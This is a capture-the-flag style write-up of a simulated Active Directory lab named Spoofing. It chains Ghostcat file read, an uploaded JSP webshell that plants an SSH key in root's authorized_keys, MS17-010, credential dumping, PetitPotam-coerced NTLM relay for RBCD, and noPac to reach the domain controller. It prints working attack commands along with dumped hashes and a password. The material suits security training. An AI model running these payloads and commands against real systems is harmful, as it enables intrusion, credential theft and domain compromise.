春秋云镜-【仿真场景】Spoofing writeup

你的名字 2024-03-26 18:58 50阅读 0赞

### 0x01 – Info ###

*  Tag: Tomcat，NTLM，WebClient，Coerce Authentication，noPac![01ab7f2ecfa8d04f24a407f1c0a47658.png][]

### 0x02 – Recon ###

1.  Target external ip
    
        47.92.146.66

1.  Nmap results  
    Focus on port 8009 (ajp) ，意味着是tomcat (对应了靶场的tomcat tag)![d2bca04eda891559edd5963b8c07fcd6.png][]
2.  目录扫描，404页面显示为tomcat 9.0.30![0cd9869bc1cf026be909a05b2092fef6.png][]
3.  Playing with Ghost cat  
    使用该项目测试[https://github.com/00theway/Ghostcat-CNVD-2020-10487][https_github.com_00theway_Ghostcat-CNVD-2020-10487]  
    读取/web-inf/web.xml![57dd648ad6e4fc04c5427641e6e4735e.png][]  
    url-pattern 结果存为字典![69171c3947c1212d50435aea48e88eff.png][]  
    FFuf![7f272e4c142426759e27e1b46645fcd3.png][]  
    关注uploadservlet![db12a2d951ee48e9cab28bbfb1a36872.png][]  
    上传temp.txt![44b8ff94c89694568e90769100f4ea4b.png][]  
    返回文件地址![87b3173971fc7fba82cda438446e87b9.png][]
    
        ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt
    
    替换 ./upload to /upload，成功读取到上传的文件
    
        python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txtread
    
    ![17fbbac8941561d398b3f047e472ef4e.png][]

### 0x03 – GhostCat命令执行 ###

1.  准备好 shell.txt![9e1f8db431dd87eddb5622bf107a3afb.png][]
    
    <% java.io.InputStream in = Runtime.getRuntime().exec(“bash -c \{echo,ZWNobyAic3NoLXJzYSBBQUFBQjNOemFDMXljMkVBQUFBREFRQUJBQUFCZ1FDL3NKaDY4Uk5hWktLakNQaE40WUxpSnJ4eDR3N3JtbDBGcFRmMTNYNHVKZlpFZm4yU25scE9rdXQ0OE1LdURHOEtDcXczRW0zNU9odXdUa2p3ZEkvRGhGN3ZSeTB0T2xtWDE5NmJHcXpndE5pM1YzUHExc3NCMzV5Ui85SHJ6ZjVEdHdqS2NKdkphV0RuZzU2UWhHZjlnR21vdUZVQWV2QjdsUWl3a01FNWNxTzVsQTRwUm5KVEh2RU1OQUkxQkc3MTBEeWNKT28rNGh1TGNNVjZhdUs3UXdKTWdnN0oyU2U5TEpGZWk2R2g0amJUSGRhdmNBVjV6VVJZeFI4QVNXSmNqY29tM2dMUEE1UWNxSzNzSERRVmswUHllaTR3cEJwWWlFUGlHcHlQR2Y1T3ErUU0xQmJyR0gvTlRBYnZWa3dDZnBkRURWdVBNNWhHOFY4c09HTjIxczlWazFjMVBXaEh2WDZ1ejhRaDRNdUdnQlRYSHlZb3duTjg3OTExVDVGR0VjVzlWeUh1cm9FSVJtdE9sY3dBYmRMc0k0NVhOS1o0aWoxdERLNTRTMmpXWXhJTjhSL1ZuUnV2RVVoTVpGOUlabDM3UW5EQnBFR25LTXFjTVE4cHVUZUJBMngvSURHMFR6MWxjVGk5WHp5WjVheTd4dTJwZStidXhWT1BSQ2M9IiA+PiAvcm9vdC8uc3NoL2F1dGhvcml6ZWRfa2V5cwoKY2htb2QgNjAwIC9yb290Ly5zc2gvYXV0aG9yaXplZF9rZXlzCg==\}|\{base64,-d\}|\{bash,-i\}”).getInputStream(); int a = -1; byte\[\] b = new byte\[2048\]; out.print(“<pre>“); while((a=in.read(b))!=-1)\{ out.println(new String(b)); \} out.print(“</pre>“);%>

1.  上传shell.txt![44873a603dbebe4d83a555f1dc4762de.png][]
2.  执行上传的代码![55467564eb337f5adb725b6fe3a415cb.png][]
3.  SSH – flag01![11891431ad24b897405a2498a1411b4b.png][]

### 0x04 – 入口 Ubuntu: 172.22.11.76 ###

1.  SSH![b3dc3f70e7465129d64b78be7dd17cc2.png][]
2.  没啥东西，直接过![11d9befdcc80cedede59c9163923acd5.png][]
3.  开代理![67f94f37618f3d273d4de6e3b90dfe1c.png][]
4.  挂代理扫445，获取到三台主机信息
    
    172.22.11.45 XR-Desktop.xiaorang.lab  
    172.22.11.6 xiaorang-dc.xiaorang.lab  
    172.22.11.26 XR-LCM3AE8B.xiaorang.lab![9ee914903d308a3b7e95f0a91b8d6b45.png][]
5.  关注172.22.11.45 – windows7 – MS17![d160db1a46e2eac7d8dc2aa0c27c254e.png][]
6.  MS17 一气呵成![eb02feccdd19a131841e568edf71babd.png][]
7.  基本操作![59f3be06f33e85dc8998ee875daa5cc2.png][]![f88963fe30c51470b2d47f526c243776.png][]  
    凭据列表
    
    Administrator 4430c690b4c1ab3f4fe4f8ac0410de4a – (本地凭据)  
    John 03cae082068e8d55ea307b75581a8859 – (本地凭据)  
    XR-DESKTOP$ 3aa5c26b39a226ab2517d9c57ef07e3e – (域凭据)  
    yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (明文) – (域凭据)  
    本人已经试过组合爆破了，没有东西，这边直接略过演示，直接到域渗透环节![02d596d6a97ccea78f60e2b84c0a2280.png][]
8.  Flag2![040f5373cc7d5b5ff5ec24915f15a452.png][]
9.  把域用户yangmei加入该机器的本地管理员![c62b0ebac2ef771a89578187202ed5d0.png][]
10. 确定域控IP为172.22.11.6 – xiaorang-dc![d157d7b4b1e3b249b292c554c560f163.png][]
11. Bloodhound收集![1af57caad1d672c22b2559dcdc7cd139.png][]

### 0x05 – 域渗透环节, 入口 XR-Desktop: 172.22.11.45 ###

*  这边快速过一下 (一句话总结：不能直接拿下域控)
    
    1.  使用Bloodhound收集到的用户名组合获取到的密码/hashes组合爆破，没发现其他新用户
    2.  MAQ = 0，加不了计算机
    3.  当前LDAP 没 TLS，远程也加不了计算机，impacket的addcomputer有两种方法samr和ldaps。samr受到MAQ = 0的限制，无法添加计算机；ldaps受到 没TLS + MAQ = 0 的限制
    4.  域控存在nopac，当前用户yangmei使用nopac没打死，并且对域内computer container没有createchild的ACL
    5.  域控存在nopac，当前用户yangmei对当前windows机器xr-desktop没WriteDacl权限，意味着无法修改SamAccountName
    6.  域内存在 DFscoerce 和 petitpotam，但是不存在CVE-2019-1040，因此放弃 DFscoerce，优先使用petitpotam
    7.  NoPac exploit: [Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)][Ridter_noPac_ Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user _github.com]

1.  Petitpotam 扫描![6b30c41e3f0ed02ea5d78c08880fab30.png][]
2.  无ADCS + Petitpotam + ntlm中继打法  
    攻击链：用petitpotam触发存在漏洞且开启了webclient服务的目标，利用petitpotam触发目标访问我们的http中继服务，目标将会使用webclient携带ntlm认证访问我们的中继，并且将其认证中继到ldap，获取到机器账户的身份，以机器账户的身份修改其自身的 msDS-AllowedToActOnBehalfOfOtherIdentity 属性，允许我们的恶意机器账户模拟以及认证访问到目标机器 (RBCD)

*  满足条件，目标机器需要开启webclient服务  
    WebClient扫描，确定只能拿下 172.22.11.26 (XR-LCM3AE8B)![6724ad77a8d9bcf97d7ea289fadb629c.png][]
 *  中继攻击前言：
    
     *  实战中的中继打法只需要停掉80占用服务，开启端口转发(portfwd，CS在后续版本中添加了rportfwd\_local，直接转发到客户端本地)
     *  本次演示类似实战的打法，不选择把impacket丢到入口ubuntu上面这种操作

1.  中继攻击环境配置: 端口转发 + 代理  
    我们目前需要把服务器的80，转发到客户端本地的80

*  注意：由于SSH的反向端口转发监听的时候只会监听127.0.0.1，所以这时候需要点技巧  
    如图所示，即使反向端口转发79端口指定监听全部 (-R \\\*:79:127.0.0.1:80)，端口79依旧绑定在了127.0.0.1(图中顺便把socks5代理也开了)![1010368ed150af9c4c48322ada691bfe.png][]  
    加多一条socat，让流量 0.0.0.0:80 转发到 127.0.0.1:79，再反向转发回客户端本地的80 ,变相使80监听在0.0.0.0![0653055bf716a8d12a3df887e7d429c9.png][]  
    测试，从172.22.11.76:80 进来的流量直接转发到了我们本地![204a544bdccf53579aa5807048c7263c.png][]  
    本地开启ntlmrelayx
 *  注意：
    
     *  前面提到，没有ldaps，所以不能使用addcomputer
     *  同时在使用proxychains后，ldap://后面只能接dc的ip
     *  利用前面拿下的XR-Desktop作为恶意机器账户设置RBCD`sudo proxychains4 -q -f proxychains.conf ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access`![f3ed4a18123e2aec119e9a40487002de.png][]

1.  使用Petitpotam触发 XR-LCM3AE8B 认证到172.22.11.76 (ubuntu)`proxychains4 -q -f ~/HTB/Spoofing/proxychains.conf python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt XR-LCM3AE8B`  
    可以看到，已经完成RBCD攻击了，接下来就是直接申请XR-LCM3AE8B的银票了![588fa94923713c6f61fd31d57398ec1a.png][]
2.  申请XR-LCM3AE8B CIFS票据![60aeea75eb5367a4b020af1880d96a85.png][]

### 0x06 – 域渗透环节 – NoPAC, 入口 XR-LCM3AE8B：172.22.11.26 ###

1.  psexec

*  flag03在 C:\\users\\administrator\\flag\\flag03.txt (这里没截图)![e56c5d1e8478b7a7738ee039d1cd32fc.png][]

1.  smbclient.py 传 mimikatz![0ec043f6d47f8f3533ac3a13d9797cb7.png][]
2.  获取到新凭据
    
        zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1
    
    ![06a3bf8c4cf90414a7e669680cd13510.png][]
3.  nopac

*  只有zhanghui能成功，zhanghui在MA\_Admin组，MA\_Admin组对computer 能够创建对象，但是在bloodhound没看到`AdFind.exe -b "CN=Computers,DC=xiaorang,DC=lab" nTSecurityDescriptor -sddl+++`![a2f90338ec2bacea41a18d26499b2743.png][]  
    Bloodhound看不到，主要原因是没把CreateChild采集进json![2a7762a73003f0be9dc8761e382bcd70.png][]

1.  回到nopac，加上 create-child 参数![18ce8153c23c7758510a999421d5ffde.png][]

### 0x07 – 域渗透环节 – xiaorang-dc ###

1.  使用nopac申请到的cifs票据登录进入DC

*  flag04在 C:\\users\\administrator\\flag\\flag04.txt (这里没截图)![b12fef7d2c68911b1cf61f5e2aec7a56.png][]

1.  域管 (略过使用mimikatz)`administrator 0fadb57f5ec71437d1b03eea2cda70b9`  
    !\[\[![69c3ef60e61c9f7c824f09161b1e6600.png][]

### 0x08 – 瞎玩 ###

尝试解决Bloodhound.py采集不到CreateChild  
bloodhound/enumeration/acls.py里面其实已经定义好了变量，只需要调用即可

![b43c7cdaa638230e9a1f1647b6386b8a.png][]

来到170行，我们添加上去，找到CreateChild就添加进数据

![e380d60e972cb8ad7d803e9890fffff4.png][]

重新跑一遍bloodhound.py，观察containers的结果，发现已经有相关数据了，RID 1132 = MA\_Admin组

![904b14dc09719d8943b3c95124b89dc9.png][]

Bloodhound示意图，但是数据还是乱

![61633c1735c2082269eac8cdd242d42f.png][]

原文链接： [https://www.anquanke.com/post/id/285771][https_www.anquanke.com_post_id_285771]

[01ab7f2ecfa8d04f24a407f1c0a47658.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/a87e7c666cce45ada9ddace0175c058d.png
[d2bca04eda891559edd5963b8c07fcd6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/60dec8535168453789972729660b7b96.png
[0cd9869bc1cf026be909a05b2092fef6.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/4ed2f19aaf614decad5650470cfedbe5.png
[https_github.com_00theway_Ghostcat-CNVD-2020-10487]: https://github.com/00theway/Ghostcat-CNVD-2020-10487
[57dd648ad6e4fc04c5427641e6e4735e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/414f970b0e624140a523898d80fa7b62.png
[69171c3947c1212d50435aea48e88eff.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/e532c5092b364379b83402f3d0b531ab.png
[7f272e4c142426759e27e1b46645fcd3.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/a6f6e6456eb84c0fb7eb7faaf65bc399.png
[db12a2d951ee48e9cab28bbfb1a36872.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f2a890f62f1a46db88d26145fee4d304.png
[44b8ff94c89694568e90769100f4ea4b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/e8148ebd69154afc965034c00eac72c5.png
[87b3173971fc7fba82cda438446e87b9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/3e8e3d6d02ee4ad384c94cb114836b2f.png
[17fbbac8941561d398b3f047e472ef4e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/14edf76343cc48f9b6f013b3a9632d56.png
[9e1f8db431dd87eddb5622bf107a3afb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/b6b98b0ffb7e4e43a2388bd0482fb52d.png
[44873a603dbebe4d83a555f1dc4762de.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/545566e4a40e4bccb59128edffec2000.png
[55467564eb337f5adb725b6fe3a415cb.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/92d1695893d149bba5c451b155e4c90b.png
[11891431ad24b897405a2498a1411b4b.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/cf19c255948049d893669616e5558b3c.png
[b3dc3f70e7465129d64b78be7dd17cc2.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/99bb97d6ddd346b09c5db2ce5f883439.png
[11d9befdcc80cedede59c9163923acd5.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/596a2e9f0504488285b540b6b1321d50.png
[67f94f37618f3d273d4de6e3b90dfe1c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/52268ebec24e422998bc00a23792fd6b.png
[9ee914903d308a3b7e95f0a91b8d6b45.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/9de2dbd73a8e4c2587ccab79e125de49.png
[d160db1a46e2eac7d8dc2aa0c27c254e.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/695582b2f0c243d38d68c275423560e5.png
[eb02feccdd19a131841e568edf71babd.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/77ecdf4f0ee8453fae14f579e52fd7fe.png
[59f3be06f33e85dc8998ee875daa5cc2.png]: https://img-blog.csdnimg.cn/img_convert/59f3be06f33e85dc8998ee875daa5cc2.png
[f88963fe30c51470b2d47f526c243776.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/23316bbd77f24ff69eeddb5bf91cc198.png
[02d596d6a97ccea78f60e2b84c0a2280.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/aba46f84eb4e464b87b8401e243ff6bd.png
[040f5373cc7d5b5ff5ec24915f15a452.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/f5e335e6acdd4aee9d06b2a57672c5c2.png
[c62b0ebac2ef771a89578187202ed5d0.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/19887f75229b4779ac4871da58897e96.png
[d157d7b4b1e3b249b292c554c560f163.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/2ab894211baf440eb06c12df438c387c.png
[1af57caad1d672c22b2559dcdc7cd139.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/07a1618c1add4c78af42f3ee20b8716e.png
[Ridter_noPac_ Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user _github.com]: https://github.com/Ridter/noPac
[6b30c41e3f0ed02ea5d78c08880fab30.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/5b0b1b63a8854e75b0fed329f582b038.png
[6724ad77a8d9bcf97d7ea289fadb629c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/02695294547647acad2a0db826444f95.png
[1010368ed150af9c4c48322ada691bfe.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/eba151da2d414eec948f7bef003419b7.png
[0653055bf716a8d12a3df887e7d429c9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/0cc10735bb5844849e1a9e6fab41d7fd.png
[204a544bdccf53579aa5807048c7263c.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/df472e09abb14969b1f7c4caf3c3a332.png
[f3ed4a18123e2aec119e9a40487002de.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/68a7378f2505428986b082d51fa569ea.png
[588fa94923713c6f61fd31d57398ec1a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/0f648680583d4f5d863f098ada3cb52d.png
[60aeea75eb5367a4b020af1880d96a85.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/55676484cf594bec9a0c63637d5af382.png
[e56c5d1e8478b7a7738ee039d1cd32fc.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/1283c819af45451da9e88f546d8506e2.png
[0ec043f6d47f8f3533ac3a13d9797cb7.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/b6f01efe18844ebcad7deb8472e39971.png
[06a3bf8c4cf90414a7e669680cd13510.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/e9713310de1c4094b6304456baf7633f.png
[a2f90338ec2bacea41a18d26499b2743.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/24f5b6e757974b218488e88b36d5f066.png
[2a7762a73003f0be9dc8761e382bcd70.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/2bada2400d8c4412aff0d03a5117e53b.png
[18ce8153c23c7758510a999421d5ffde.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/b81ab6fcf2514ca8aafe851e7b944957.png
[b12fef7d2c68911b1cf61f5e2aec7a56.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/9431ea89d6114dd0979ac1f60723b5b5.png
[69c3ef60e61c9f7c824f09161b1e6600.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/8022db6f89904aa8a154fe36d20c479c.png
[b43c7cdaa638230e9a1f1647b6386b8a.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/e55ff4d6062f496fa0dbc42fa8934ff3.png
[e380d60e972cb8ad7d803e9890fffff4.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/c032c27578814b2280d763a2ca5db407.png
[904b14dc09719d8943b3c95124b89dc9.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/46bff5a47800490d8561e9855d6685e6.png
[61633c1735c2082269eac8cdd242d42f.png]: https://image.dandelioncloud.cn/pgy_files/images/2024/03/26/adc1fd14e0314698ac7c08beaa74fe42.png
[https_www.anquanke.com_post_id_285771]: https://www.anquanke.com/post/id/285771